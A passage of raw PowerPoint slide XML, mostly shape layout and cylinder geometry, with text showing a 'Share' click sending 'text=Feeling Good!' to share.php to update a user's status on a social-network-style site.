        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="1583181"/>
            <a:ext cx="6249247" cy="2463800"/>
            <a:chOff x="2209800" y="1187386"/>
            <a:chExt cx="4686935" cy="184785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1200086"/>
              <a:ext cx="3733800" cy="1082675"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>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21" name="object 21"/>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22" name="object 22"/>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23" name="object 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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6" name="object 26"/>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7" name="object 27"/>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8" name="object 28"/>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29" name="object 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3335867" y="3635756"/>
            <a:ext cx="5215467" cy="944880"/>
            <a:chOff x="2501900" y="2726817"/>
            <a:chExt cx="3911600" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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31" name="object 31"/>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32" name="object 32"/>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33" name="object 33"/>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text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173253"/>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657600" y="4173254"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320031">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4218585"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3163938"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3163938"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="3943349"/>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9" name="object 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5257801"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>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8"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>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233576" y="4209966"/>
            <a:ext cx="1715347" cy="1220313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4233" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16086" marR="6773" indent="-847" algn="ctr">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>update user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status with the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-867" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>text </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“Feeling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>good!”</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="1583181"/>
            <a:ext cx="6249247" cy="2463800"/>
            <a:chOff x="2209800" y="1187386"/>
            <a:chExt cx="4686935" cy="184785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1200086"/>
              <a:ext cx="3733800" cy="1082675"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>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21" name="object 21"/>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22" name="object 22"/>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23" name="object 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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6" name="object 26"/>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7" name="object 27"/>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8" name="object 28"/>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29" name="object 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3335867" y="3635756"/>
            <a:ext cx="5215467" cy="944880"/>
            <a:chOff x="2501900" y="2726817"/>
            <a:chExt cx="3911600" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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31" name="object 31"/>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32" name="object 32"/>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33" name="object 33"/>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text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173253"/>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657600" y="4173254"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320031">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4218585"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3163938"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3163938"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="3943349"/>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9" name="object 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5257801"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10446851" y="1144185"/>
            <a:ext cx="1303867" cy="1722967"/>
            <a:chOff x="7835138" y="858138"/>
            <a:chExt cx="977900" cy="1292225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="989964"/>
              <a:ext cx="952500" cy="1148080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1148080">
                  <a:moveTo>
                    <a:pt x="952500" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="118999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1147699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="object 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="238125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="238125">
                  <a:moveTo>
                    <a:pt x="476250" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="136725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="169320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="94B3D6"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="1266825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="1165425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="1198020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1237658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1266825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1265536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1261791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1255775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1247669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1237658"/>
                  </a:lnTo>
